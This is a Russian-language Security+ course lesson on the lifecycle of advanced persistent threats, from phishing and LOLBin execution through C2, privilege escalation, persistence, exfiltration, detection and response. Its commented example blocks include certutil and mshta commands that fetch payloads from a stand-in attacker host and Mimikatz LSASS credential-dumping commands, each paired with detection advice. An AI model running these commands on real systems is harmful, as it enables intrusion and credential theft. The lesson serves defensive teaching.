Жизненный цикл APT: от первоначального доступа до закрепления
Проследите путь APT от первоначального доступа через целевой фишинг до установления C2, повышения привилегий и механизмов закрепления, сохраняющихся после перезагрузки и повторной установки системы.
«Жизненный цикл APT: от первоначального доступа до закрепления» — бесплатный урок Cloud & IT Cert Prep на CoddyKit. Это урок 1 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cloud & IT Cert Prep, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cloud & IT Cert Prep содержит 4 уроков всего.
Что такое Advanced Persistent Threat?
Advanced Persistent Threat (APT) — это сложная продолжительная кампания кибератаки, которую обычно проводят государственные субъекты или хорошо финансируемые преступные группы для достижения конкретных стратегических целей. Три определяющие характеристики: Advanced — используются специально созданные вредоносные программы, уязвимости нулевого дня и новые методы; Persistent — скрытое присутствие сохраняется месяцами или годами, это не разовая атака с быстрым захватом добычи; Threat — это скоординированная целевая атака на конкретную организацию. Среди известных групп APT — APT28 (Fancy Bear), связанная с российской GRU, APT41, связанная с Китаем, и Lazarus Group, связанная с Северной Кореей.
Первоначальный доступ: как APT проникают в системы
Кампании APT обычно начинаются с одного из нескольких проверенных методов первоначального доступа. Наиболее распространённый метод — целевой фишинг с вредоносными вложениями или ссылками для кражи учётных данных: письмо выглядит так, будто оно пришло от надёжного коллеги или партнёра. Компрометация цепочки поставок (как в случае SolarWinds/SUNBURST) внедряет вредоносный код в доверенные обновления программного обеспечения. Эксплуатация служб, доступных из интернета (VPN-устройств, серверов Exchange, веб-приложений) с использованием неустранённых CVE. При атаках через заражённые сайты взламываются веб-сайты, которые часто посещают сотрудники целевой организации, после чего посетителям доставляются эксплойты при обычном посещении.
Выполнение: запуск первой полезной нагрузки
Получив первоначальный доступ, злоумышленник должен выполнить первую полезную нагрузку в целевой системе. APT предпочитают методы, неотличимые от обычной активности системы: вредоносные макросы в документах Office, выполняющиеся после разрешения содержимого пользователем; файлы HTML Application (HTA), выполняющие сценарии при открытии; двоичные файлы Living-off-the-Land (LOLBins) — использование легитимных инструментов Windows, таких как mshta.exe, certutil.exe, regsvr32.exe или wscript.exe, для выполнения кода злоумышленника в обход списков разрешённых приложений. Эти методы затрудняют отличие первоначальных полезных нагрузок от легитимной активности системы.
# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta
# Detection: alert on certutil/mshta with network connectionsУстановление C2: связь с центром управления
После выполнения первоначальной полезной нагрузки устанавливается канал Command and Control (C2) с инфраструктурой злоумышленника. Современные средства C2 у APT используют методы обхода обнаружения: HTTPS и похожие домены, имитирующие легитимные облачные службы (Teams, OneDrive, GitHub); туннелирование DNS — кодирование команд в запросах DNS к записям TXT, которые выглядят как обычный DNS-трафик; алгоритмы генерации доменов (DGA), создающие каждый день новый домен C2 из начального значения, из-за чего блокировка доменов становится неэффективной; а также C2 по принципу использования штатных средств системы через легитимные облачные платформы (API Slack, Google Sheets, Twitter), выступающие каналом связи.
# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)
# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)Разведка: картирование среды
Установив C2, субъекты APT проводят внутреннюю разведку, чтобы понять устройство среды перед дальнейшим продвижением. Она включает: перечисление Active Directory с помощью таких инструментов, как BloodHound, для картирования доверительных отношений и выявления ценных целей; сканирование сети для обнаружения активных узлов, служб и открытых портов; поиск учётных данных через изучение файловых систем в поисках конфигурационных файлов, баз паролей или данных, сохранённых в браузерах; а также перечисление идентификационных данных для выявления привилегированных учётных записей, служебных учётных записей и рабочих станций администраторов. Для предотвращения обнаружения большая часть разведывательной активности использует встроенные инструменты Windows (net user /domain, ipconfig, nltest).
# Native Windows commands used by APTs for discovery
# net user /domain # list domain users
# net group 'Domain Admins' /domain # list domain admins
# ipconfig /all # network configuration
# netstat -ano # active network connections
# tasklist /v # running processesПовышение привилегий: получение прав администратора
Обычно APT получают первоначальный доступ с ограниченными учётными данными пользователя и должны повысить привилегии для достижения своих целей. Распространённые пути повышения привилегий включают: кражу учётных данных из памяти с помощью Mimikatz (извлечение хешей NTLM из памяти процесса LSASS); Kerberoasting (запрос служебных билетов для служебных учётных записей и их автономный подбор); эксплуатацию неправильно настроенных служб со слабыми разрешениями (небезопасные пути к двоичным файлам служб, подмена DLL); а также имперсонацию токена для кражи токена аутентификации привилегированного процесса. Методы обхода User Account Control (UAC) позволяют перейти от обычного администратора к SYSTEM без появления запроса UAC.
# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords
# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS processМеханизмы закрепления: сохранение после перезагрузки
APT активно используют механизмы закрепления, сохраняющиеся после перезагрузки и переустановки образа, поскольку первоначальный доступ мог потребовать значительных усилий и затрат. Распространённые методы закрепления в Windows: ключи Registry Run (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); запланированные задания, регулярно запускающие вредоносную программу; службы Windows, запускающиеся автоматически; подписки на события WMI (их трудно обнаружить, и они переживают большинство попыток очистки); подмена порядка поиска DLL; а также импланты загрузки и предшествующие запуску OS (импланты в прошивке UEFI, сохраняющиеся после переустановки OS и использовавшиеся группой Equation и субъектами, связанными с NSA).
# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services
# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'Сокрытие следов: незаметность на виду
APT активно используют уклонение от обнаружения, чтобы не попадаться средствам защиты конечных точек и аналитикам. Методы включают: внедрение в процессы — внедрение вредоносного кода в легитимные процессы, такие как explorer.exe или svchost.exe, чтобы вредоносная программа работала под именем доверенного процесса; изменение временных меток — изменение временных меток файлов, чтобы вредоносные файлы выглядели существующими уже много лет; удаление и подделка журналов — очистка журналов событий Windows для удаления следов; злоупотребление сертификатами подписи кода — подпись вредоносных программ с помощью украденных легитимных сертификатов; а также выполнение в памяти (безфайловые вредоносные программы), при котором данные никогда не записываются на диск, где их обнаружил бы файловый AV.
Скрытая кража данных
APT тщательно организуют вывод данных, чтобы не активировать средства контроля DLP и обнаружение аномалий пропускной способности. Методы включают: подготовку данных — сбор целевых данных в зашифрованный архив перед их выводом небольшими частями в течение нескольких дней; вывод через HTTPS в службы облачного хранения (OneDrive, Dropbox), разрешённые корпоративными правилами межсетевого экрана; стеганографию — сокрытие данных внутри файлов изображений; и вывод по времени в рабочие часы, чтобы замаскировать трафик под легитимный. APT выводят только необходимые данные (ценную интеллектуальную собственность, учётные данные, стратегические планы), а не копируют всё подряд, уменьшая свой цифровой след и вероятность обнаружения.
Обнаружение активности APT: ключевые признаки
Для обнаружения APT необходимо анализировать не отдельные оповещения, а закономерности связанной активности на разных этапах цепочки атаки. Ключевые признаки включают: необычные отношения родительского и дочернего процессов (например, запуск PowerShell из Word); закодированные команды PowerShell или загрузки из интернета; создание запланированных задач или служб в необычное время; доступ к памяти LSASS со стороны процессов, не относящихся к системным; перемещение внутри сети через SMB или WMI с рабочих станций; а также необычные исходящие DNS-запросы с длинными именами поддоменов. MITRE ATT&CK Navigator позволяет специалистам по защите сопоставлять обнаруженные методы с матрицей ATT&CK и выявлять пробелы в покрытии обнаружения.
# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLineРеагирование на APT: сдерживание без раскрытия
Реагирование на активную APT требует осторожного баланса: сдержать угрозу, не предупредив атакующего. Преждевременное сдерживание (блокировка трафика C2, отключение учётных записей) может заставить APT активировать разрушительную полезную нагрузку или ускорить вывод данных. Рекомендуемые методы включают: скрытое наблюдение во время сбора сведений; постепенную изоляцию заражённых узлов с помощью правил межсетевого экрана без блокировки C2; внедрение технологий обмана (маркеры-приманки, учётные записи-ловушки) для наблюдения за активностью атакующего; а также координацию с правоохранительными органами до выполнения масштабных действий по сдерживанию. Полное устранение последствий требует выявить все механизмы закрепления и скомпрометированные учётные записи: одного пропущенного импланта достаточно, чтобы атакующий вернулся.
Быстрая проверка
Проверьте, насколько хорошо Вы усвоили концепции CompTIA Security+ (SY0-701) из этого урока.
Итоги урока
В этом уроке Вы узнали: APT — это сложные, устойчивые и целенаправленные кампании, обычно продолжающиеся месяцами и использующие целевой фишинг, атаки через цепочку поставок или эксплуатацию уязвимостей для первоначального доступа; APT используют LOLBins и легитимные облачные службы для C2, чтобы имитировать обычный трафик и избегать обнаружения; а механизмы закрепления варьируются от ключей запуска Registry до имплантов в микропрограмме UEFI, причём подписки WMI особенно трудно обнаружить и устранить. Далее мы рассмотрим методы перемещения внутри сети, включая Pass-the-Hash и Pass-the-Ticket.
Часто задаваемые вопросы
Урок «Жизненный цикл APT: от первоначального доступа до закрепления» бесплатный?
Да — полный текст урока «Жизненный цикл APT: от первоначального доступа до закрепления» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cloud & IT Cert Prep, подпишись на CoddyKit PRO. Курс Cloud & IT Cert Prep содержит 4 уроков всего.
Чему я научусь в уроке «Жизненный цикл APT: от первоначального доступа до закрепления»?
Проследите путь APT от первоначального доступа через целевой фишинг до установления C2, повышения привилегий и механизмов закрепления, сохраняющихся после перезагрузки и повторной установки системы. Ты практикуешь Cloud & IT Cert Prep с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cloud & IT Cert Prep?
Предыдущий опыт не требуется. Cloud & IT Cert Prep на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 1 из 4.
Сколько времени занимает урок «Жизненный цикл APT: от первоначального доступа до закрепления»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cloud & IT Cert Prep?
Да. Каждый урок Cloud & IT Cert Prep включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Жизненный цикл APT: от первоначального доступа до закрепления
- Горизонтальное перемещение: Pass-the-Hash и Pass-the-Ticket
- Kerberoasting и атаки Golden Ticket
- Фреймворк MITRE ATT&CK для обнаружения и реагирования